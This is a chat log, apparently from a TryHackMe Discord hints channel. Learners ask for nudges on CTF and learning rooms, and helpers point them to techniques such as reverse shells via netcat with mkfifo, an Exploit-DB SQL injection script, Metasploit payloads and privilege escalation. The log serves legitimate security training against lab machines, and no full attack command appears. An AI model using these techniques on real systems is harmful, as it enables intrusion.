i have got the answer but still not working , in https://tryhackme.com/room/ice

some one on Psycho Break Task2 #4, if find somthing

@weary quarry if its saying wrong then your answer is wrong.

yes i have rooted

i know it is ||remote code exec||

Its wrong.

some one on Psycho Break Task2 #4, if find somthing
@solar scroll have it

@weary quarry look harder.

@weary quarry search again.

Sure

I hope treid all combinations

Never mind I havr rooted

Hey @weary quarry can you help me out then 🙂

I have not done that machine @final mortar

Ah my bad

72 hours are not passed since the release of room so no. You have to wait few more hours.

oh oke thanks

Anybody here done Revenge? I got root but can't seem to find the final flag
nvm got it

is it possibile to find xss on thm machines?

Yes

Hello, a quick query, looking at day 10 of Advent of Cyber, how do you come to find that its running a vulnerable version of struts? I am using nmap and it just shows me Apache/Coyote, am I missing something?

Tried nikto?

no, will try that now, thanks

@stuck fractal boom, cheers

Guys, i joined Smag Grotto room and i stucked in the middle. After that, i decided to look up some writeups and I had to put domain name into my /etc/hosts file. Why should i do that?

Can i just click it on my browser directly with the IP?

Guys, i joined Smag Grotto room and i stucked in the middle. After that, i decided to look up some writeups and I had to put domain name into my /etc/hosts file. Why should i do that?
@granite flame With the IP too

I've been stuck at the admin login page for Year of the Pig since it came out. I don't think I'm able to exploit the obfuscated js file I found, so I have a feeling this is a password guessing situation. The password hint specifically states the password should be a memorable word, then 2 numbers, then a special character. I have not found any to work, unless this is just some cruel rabbit hole

@plush estuary ^

I got past that bit ok Myles

@graceful dagger Take a look at what happening with the password before its sent to the server

The password is also not in any password list

Can i just click it on my browser directly with the IP?
@granite flame you need to add it to your hosts file if it has virtual host routing like that box does

I am sorry. But what is actually virtual host?

https://www.google.com/search?q=what+is+virtual+host&ie=UTF-8&oe=UTF-8&hl=en-us&client=safari

Yeah, i have to google it first

Thankss..

OWASP juiceShop task 7, q2 for the persistent XSS, I’ve done it many, many times and no flag ever comes up. What do I need to do as clearly there is a bug on this question to get the flag? Also tried changing the settings in Firefox config:about browser.urlbar.JavaScript boleen to false with no joy.

hi @plush estuary mind if i ask for some nudges on login page for yotp? been stuck there for quite a while now

yotpig room has passed 72 hours isnt it

Muir made YOTP

Muir made YOTP
@astral smelt Yes, but cake was here with hints a little earlier

Like 8 hours ago lol

Oh right

@atomic shuttle You will need to make your own wordlist for this one :)

OWASP juiceShop task 7, q2 for the persistent XSS, I’ve done it many, many times and no flag ever comes up. What do I need to do as clearly there is a bug on this question to get the flag? Also tried changing the settings in Firefox config:about browser.urlbar.JavaScript boleen to false with no joy.
@opaque dagger I did this room just some hours ago. Everything should work out fine following the instructions

Sometimes burp stops the flag from being shown, just disable it and you should see the flag

Hello guys. I'm stuck. In the room https://tryhackme.com/room/easyctf, The exploit https://www.exploit-db.com/exploits/46635 to perform SQLi on the CMS Made Easy site is not producing the results I expect. May someone explain how this exploit is to be run? I've been trying it but no reasonable output.

Can you show the output @shut lion

As well as how you’re running it

that's how I'm running it.

And the output?

Go make lunch I'm here.

Thank you darky

And the output?
@oblique cliff ...and it's still running. that's for just calculating the salt. other times, none of the fields are found.

It takes some time.

That’s wrong tho

try changing it from http://10.10.40.185/simple/admin to http://10.10.40.185/simple/ ?

Tell him how to fix

But also @wintry yarrow

Also, try to change timer to 5 or something on code.

Ok grill is preheated. Byeeeee

Bye Blob

Ty for the honor.

@trim haven @wintry yarrow let me implement your suggestions

thanks in advance

The advice has worked out for me 👍

Great. 🙂

hey guys, im pushing through smaggrotto right now and im struggling with || getting a reverse shell from development.smag.thm/admin.php || ive tried || bash, python, perl, nc and even using curl to output writable directories to my localhost via requests|| no luck so far, im sure im missing something small and am being silly. a nudge would greatly be appreciated!

@rose cape could you show your syntax?

nc with mkfifo almost always works

i know at least 2 of those work

which method do you want me to show you

netcat

not popping anything

nc with mkfifo almost always works

omg

🤦‍♂️

yo thanks sorry about that

i skimmed over what ninja said just reacting with the cat knife thing lol

lmao

i should know by now ninja is the enlightened one

its easy to skip over what @stuck fractal is saying and just react with

he gets that kinda reaction from people

lol

I'm correct weirdly often

i skimmed over what ninja said just reacting with the cat knife thing lol
@rose cape It's a blobknife!

omg my bad :(((((((((((

how dare you

what's a good way to priv esc from sudoedit?

Room, task, question, have you done your research?

hmm, I don't want to spoil anything so is it k if I dm instead?

Not really

Mark it as a spoiler if you need to

kk, the room's year of the pig. I've gotten pretty far and I'm on the last step of exploitation right now

I'm fairly certain it's to deal with ||environment variables|| but I'm uncertain about it

can i ask a hint about Revenge?

Hi , curious if anyone faced this in Retro , after getting reverse shell , can't get output of any command !

Hi, im new to all this, how do i change options in metasploit, im doing eternal bule and i got stuck

Hi, im new to all this, how do i change options in metasploit, im doing eternal bule and i got stuck
@wicked granite set variable value

I recommend trying the metasploit room first, it's pretty good imo https://tryhackme.com/room/rpmetasploit

sounds good

Im stuck on T3 Q6 of rpmetasploit

what does it mean by netcat like feature

Do you know what netcat is?

no

Well there's a great place to start then

is it like network wide cat function?

Research it!

Research is a fundamental skill in cybersec

yea, im reading on it rn

Hey james ty, i found the answer while it was right in my face

hey guys

Just ask directly.

i need a hint for Flag 3 is located where bob's bash history gets stored.

i tried diffrent command i googled it didn't work

Look for a file.

permission denied

sorry but which box are you doing right now?

On the metasploit box, T5 Q9 do i replace where it says payload

yeah, otherwise it won't work

it's a meterpreter shell so if you tried catching it via nc it'll segfault iirc

set payload, not use payload

task11 linux tutorial?

What's up?

i know a bit of linux but something doesnt work

You're going to have to be MUCH less vague.

when i try to run a binary it writes permission denied

Show us.

Screenshot

i do have ubuntu

i dual booted my pc

i had ubuntu first and then i downloaded win10

That's not the binary

You still need to SSH into the machine

You have skipped over that part.

oh

ok

You need to SSH into the VM that you deploy int he room

Not the attackbox

wdym

i downloaded putty rn

There is a DEPLOY button on the 1st question for the machine

ik

ssh into it with putty

instructions unclear

no wonder why everyone is stuck at the same place

The instructions are clear.

where does this /tmp/ stuff comes from then

it tells me no information about that

It's an example.

how am I supposed to know that lol

You're expected to do your own research as well.

then its like cheating

so i need shiba1and my pc ip?

They're literally screenshots to show examples of the command, how is that not an example?

i thought it tells me to do the same way

then its like cheating
@fathom ridge That's not how infosec works. Infosec is ALL about research

as in the pictures

i thought it tells me to do the same way
@fathom ridge It does not. Read the instructions.

?

Walah i quit bro

Bye.

so i need shiba1and my pc ip?
@opaque monolith is it k @stuck fractal

No

Deploy the machine here, and get the Ip from there and put it into putty @opaque monolith

You need to deploy the machine in the room

Get the IP from Active Machine Information

i did that

where is it?

activemachine info

it comes up when you click the deploy button

it worked!

i used the welcome machine

It does explicitly warn you about that

thx im dumb

is it arch?\

ubuntu 18

is it arch?
@opaque monolith Never.

THM doesn't support uploading it, so you won't see an arch machine on THM ever.

it's possible but there's not much point

oh

ok

i have ubuntu 18.04

I just tried running the noot.txt

i dual booted it

it says permission denied

bruh

That's a blank text file

Why would that be executable as a binary?

You're told the name of the binary.

this is too hard

don't quit

try some time later

There's no way to instantly become a master hacker

You need to learn, that takes work. And research.

putty isnt connecting

connection timed out

screen shot

sure

are you connected to openvpn?

Are you connected to the VPN?

no

(You can SSH into the machine from the attackbox)

im fiber
@opaque monolith That's not related.

yeah

im dumb

you need to connect to thm network (using openvpn) if you are using your own personal machine

downloaded

how do i connect to thm?

!vpn

k

what happend to eu2 servers

Nothing

page lost in matrix

refresh

@tacit roost if you're around, EU2 seems to be 404ing again

refresh
@median reef Nope

Regenerate, and try again

it does 04

Otherwise it's something on THM's side

404

ok

try eu1

i did

it worked

ill just use ubuntu 18.04 next time

ill just use ubuntu 18.04 next time
@opaque monolith That doesn't really relate at all here

yay

ive done it

Please don't post answers or passwords

oh yeah

sry

wdym task12 by specify which shell?

It's asking about su

Read the manual

i did

It's in there.

You can scroll in the manual

this ?

ok

i did it

sry again

Man pages are gold

Super useful

Please don't show answers @barren tulip

But you didn't change user when you were told to

oopsies

oh hmm thanks

Hi, I am doing the OWASP TOP 10 room, Day 9, task 30, I have to search in exploit-database, but I dont know what I have to search

the hint is:

You know its a bookstore application, you should check for recent unauthenticated bookstore app rce's.

@safe nova Well, if we know it`s a book store, try searchsploit something like "searchsploit book store", the description says it's a RCE, so it's easy, make sure you edit the exploit.
But, you need to find directory(ies) with gobuster or dirb or dirbuster ..., after that you will find more details about ..

https://tryhackme.com/room/rpburpsuite Task 11 #5 who can give me a hint ?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
  @white salmon

linux task 18 .2

when i did echo $home didnt show anything

Variables are case sensitive

and $Home

oh ok

lol

u wrote "home" in the question and u didnt mention case sensitive

I didn't write that

ok

can someone help with binary- shiba2?

Yeah, it's best to just ask directly and someone will help.

ok

so

i didnt find test1234

i tried ls -a |grep $test1234

It's an environment variable

That you need to create

It's not a file

ok

i created test1234

with export test1234=$USER

is it ok?

Try it and see

i tried to cat it

but it did something weird

Yep, don't cat a compiled binary

Some of the bytes will be weird characters, because it's raw binary rather than text

when i echoed it it wrote shiba2

You need to set the variable

Then run the binary

The binary will check the value of the variable and if it's set right you'll be given the password

wdym by setting it

IDk if you've done programming before

But setting a variable, putting a value in there

i did

yea

So then run the binary

And you'll get the password

i forgot to run

hello, could somebody help me ? i posted my issue on #room-help fi somebody could, ill be thankful (hope that`s the word)

Someone around I can DM who has already completed Dave's Blog and has an understanding of ROP? I completed the room recently and I want to verify that I understand the exploit necessary for the final flag correctly.

@lunar sorrel I might help

if you still need it

Can i get any hints for revenge please

Im on room blue and i keep getting the message "exploit completed, but no session was created"

Im on room blue and i keep getting the message "exploit completed, but no session was created"
@wicked granite have you checked your payload?

no, how do i do that again?